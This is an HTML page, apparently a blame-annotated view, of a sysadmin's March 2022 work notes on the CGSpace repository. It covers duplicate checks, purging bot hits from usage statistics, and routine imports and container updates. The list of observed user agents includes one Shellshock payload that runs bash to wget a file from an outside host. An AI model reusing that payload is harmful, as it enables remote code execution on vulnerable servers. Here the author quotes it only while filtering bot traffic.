2022-03-01 15:48:40 +01:00
<!DOCTYPE html>
< html lang = "en" >
< head >
< meta charset = "utf-8" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, shrink-to-fit=no" >
< meta property = "og:title" content = "March, 2022" / >
< meta property = "og:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
" />
< meta property = "og:type" content = "article" / >
< meta property = "og:url" content = "https://alanorth.github.io/cgspace-notes/2022-03/" / >
< meta property = "article:published_time" content = "2022-03-01T16:46:54+03:00" / >
2022-03-13 20:08:57 +01:00
< meta property = "article:modified_time" content = "2022-03-10T14:35:14+03:00" / >
2022-03-01 15:48:40 +01:00
< meta name = "twitter:card" content = "summary" / >
< meta name = "twitter:title" content = "March, 2022" / >
< meta name = "twitter:description" content = "2022-03-01
Send Gaia the last batch of potential duplicates for items 701 to 980:
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p ' fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
"/>
2022-03-10 12:35:14 +01:00
< meta name = "generator" content = "Hugo 0.93.2" / >
2022-03-01 15:48:40 +01:00
< script type = "application/ld+json" >
{
"@context": "http://schema.org",
"@type": "BlogPosting",
"headline": "March, 2022",
"url": "https://alanorth.github.io/cgspace-notes/2022-03/",
2022-03-13 20:08:57 +01:00
"wordCount": "488",
2022-03-01 15:48:40 +01:00
"datePublished": "2022-03-01T16:46:54+03:00",
2022-03-13 20:08:57 +01:00
"dateModified": "2022-03-10T14:35:14+03:00",
2022-03-01 15:48:40 +01:00
"author": {
"@type": "Person",
"name": "Alan Orth"
},
"keywords": "Notes"
}
< / script >
< link rel = "canonical" href = "https://alanorth.github.io/cgspace-notes/2022-03/" >
< title > March, 2022 | CGSpace Notes< / title >
<!-- combined, minified CSS -->
< link href = "https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel = "stylesheet" integrity = "sha256-vrgBLtwIuhC+AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin = "anonymous" >
<!-- minified Font Awesome for SVG icons -->
< script defer src = "https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity = "sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz+lcnA=" crossorigin = "anonymous" > < / script >
<!-- RSS 2.0 feed -->
< / head >
< body >
< div class = "blog-masthead" >
< div class = "container" >
< nav class = "nav blog-nav" >
< a class = "nav-link " href = "https://alanorth.github.io/cgspace-notes/" > Home< / a >
< / nav >
< / div >
< / div >
< header class = "blog-header" >
< div class = "container" >
< h1 class = "blog-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/" rel = "home" > CGSpace Notes< / a > < / h1 >
< p class = "lead blog-description" dir = "auto" > Documenting day-to-day work on the < a href = "https://cgspace.cgiar.org" > CGSpace< / a > repository.< / p >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div class = "col-sm-8 blog-main" >
< article class = "blog-post" >
< header >
< h2 class = "blog-post-title" dir = "auto" > < a href = "https://alanorth.github.io/cgspace-notes/2022-03/" > March, 2022< / a > < / h2 >
< p class = "blog-post-meta" >
< time datetime = "2022-03-01T16:46:54+03:00" > Tue Mar 01, 2022< / time >
in
< span class = "fas fa-folder" aria-hidden = "true" > < / span > < a href = "/cgspace-notes/categories/notes/" rel = "category tag" > Notes< / a >
< / p >
< / header >
< h2 id = "2022-03-01" > 2022-03-01< / h2 >
< ul >
< li > Send Gaia the last batch of potential duplicates for items 701 to 980:< / li >
< / ul >
2022-03-04 13:30:06 +01:00
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
< / span > < / span > < span style = "display:flex;" > < span > $ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p < span style = "color:#e6db74" > ' fuuu' < / span > -o /tmp/2022-03-01-tac-batch4-701-980.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
< / span > < / span > < span style = "display:flex;" > < span > $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-04" > 2022-03-04< / h2 >
< ul >
< li > Looking over the CGSpace Solr statistics from 2022-02
< ul >
< li > I see a few new bots, though once I expanded my search for user agents with “ www” in the name I found so many more!< / li >
< li > Here are some of the more prevalent or weird ones:
< ul >
< li > axios/0.21.1< / li >
< li > Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)< / li >
< li > Nutraspace/Nutch-1.2 (< a href = "http://www.nutraspace.com" > www.nutraspace.com< / a > )< / li >
< li > Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; < a href = "mailto:webmaster@moreover.com" > webmaster@moreover.com< / a > )< / li >
< li > Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com< / li >
< li > Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)< / li >
< li > Crowsnest/0.5 (+http://www.crowsnest.tv/)< / li >
< li > Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com< / li >
< li > metha/0.2.27< / li >
< li > ZaloPC-win32-24v454< / li >
< li > Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x< / li >
< li > ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)< / li >
< li > FullStoryBot/1.0 (+https://www.fullstory.com)< / li >
< li > Link Validity Check From: < a href = "http://www.usgs.gov" > http://www.usgs.gov< / a > < / li >
< li > OSPScraper (+https://www.opensyllabusproject.org)< / li >
< li > () { :;}; /bin/bash -c " wget -O /tmp/bbb < a href = "http://www.redel.net.br/1.php?id=3137382e37392e3138372e313832" > www.redel.net.br/1.php?id=3137382e37392e3138372e313832< / a > " < / li >
< / ul >
< / li >
< li > I submitted < a href = "https://github.com/atmire/COUNTER-Robots/pull/52" > a pull request to COUNTER-Robots< / a > with some of these< / li >
< / ul >
< / li >
< li > I purged a bunch of hits from the stats using the < code > check-spider-hits.sh< / code > script:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > ]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
< / span > < / span > < span style = "display:flex;" > < span > Purging 6 hits from scalaj-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 5 hits from lua-resty-http in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 9 hits from AHC in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 7 hits from acebookexternalhit in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1011 hits from axios\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2216 hits from Faveeo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1164 hits from Moreover\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 740 hits from Exploratodo\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 585 hits from GroupHigh\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 438 hits from Crowsnest\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1326 hits from nbertaupete95 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 182 hits from metha\/[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 68 hits from ZaloPC-win32-24v454 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1644 hits from Firefox\/x\.x in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 678 hits from ZoteroTranslationServer in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 27 hits from FullStoryBot in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from Link Validity Check in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 26 hits from OSPScraper in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 1 hits from 3137382e37392e3138372e313832 in statistics
< / span > < / span > < span style = "display:flex;" > < span > Purging 2755 hits from Nutch-[0-9] in statistics
< / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" >
< / span > < / span > < / span > < span style = "display:flex;" > < span > < span style = "color:#960050;background-color:#1e0010" > < / span > Total number of bot hits purged: 12914
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project< / li >
< / ul >
2022-03-05 21:14:13 +01:00
< h2 id = "2022-03-05" > 2022-03-05< / h2 >
< ul >
< li > Start AReS harvest< / li >
< / ul >
2022-03-10 12:35:14 +01:00
< h2 id = "2022-03-10" > 2022-03-10< / h2 >
< ul >
< li > A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701– 980 in the spreadsheet)
< ul >
< li > I created a filter in LibreOffice and selected the IDs for items with the action “ delete” , then I created a custom text facet in OpenRefine with this GREL:< / li >
< / ul >
< / li >
< / ul >
< pre tabindex = "0" > < code > or(
isNotNull(value.match(' 707' )),
isNotNull(value.match(' 709' )),
isNotNull(value.match(' 710' )),
isNotNull(value.match(' 711' )),
isNotNull(value.match(' 713' )),
isNotNull(value.match(' 717' )),
isNotNull(value.match(' 718' )),
...
isNotNull(value.match(' 821' ))
)
< / code > < / pre > < ul >
< li > Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ JAVA_OPTS< span style = "color:#f92672" > =< / span > < span style = "color:#e6db74" > " -Xmx1024m -Dfile.encoding=UTF-8" < / span > dspace import --add --eperson< span style = "color:#f92672" > =< / span > fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile< span style = "color:#f92672" > =< / span > ./2022-03-10-tac-batch4-701to980.map
2022-03-13 20:08:57 +01:00
< / span > < / span > < / code > < / pre > < / div > < h2 id = "2022-03-12" > 2022-03-12< / h2 >
< ul >
< li > Update all containers and rebuild OpenRXV on linode20:< / li >
< / ul >
< div class = "highlight" > < pre tabindex = "0" style = "color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;" > < code class = "language-console" data-lang = "console" > < span style = "display:flex;" > < span > $ docker images | grep -v ^REPO | sed < span style = "color:#e6db74" > ' s/ \+/:/g' < / span > | cut -d: -f1,2 | xargs -L1 docker pull
< / span > < / span > < span style = "display:flex;" > < span > $ docker-compose build
< / span > < / span > < / code > < / pre > < / div > < ul >
< li > Then run all system updates and reboot< / li >
< li > Start a full harvest on AReS< / li >
< / ul >
<!-- raw HTML omitted -->
2022-03-01 15:48:40 +01:00
< / article >
< / div > <!-- /.blog - main -->
< aside class = "col-sm-3 ml-auto blog-sidebar" >
< section class = "sidebar-module" >
< h4 > Recent Posts< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "/cgspace-notes/2022-03/" > March, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2022-02/" > February, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2022-01/" > January, 2022< / a > < / li >
< li > < a href = "/cgspace-notes/2021-12/" > December, 2021< / a > < / li >
< li > < a href = "/cgspace-notes/2021-11/" > November, 2021< / a > < / li >
< / ol >
< / section >
< section class = "sidebar-module" >
< h4 > Links< / h4 >
< ol class = "list-unstyled" >
< li > < a href = "https://cgspace.cgiar.org" > CGSpace< / a > < / li >
< li > < a href = "https://dspacetest.cgiar.org" > DSpace Test< / a > < / li >
< li > < a href = "https://github.com/ilri/DSpace" > CGSpace @ GitHub< / a > < / li >
< / ol >
< / section >
< / aside >
< / div > <!-- /.row -->
< / div > <!-- /.container -->
< footer class = "blog-footer" >
< p dir = "auto" >
Blog template created by < a href = "https://twitter.com/mdo" > @mdo< / a > , ported to Hugo by < a href = 'https://twitter.com/mralanorth' > @mralanorth< / a > .
< / p >
< p >
< a href = "#" > Back to top< / a >
< / p >
< / footer >
< / body >
< / html >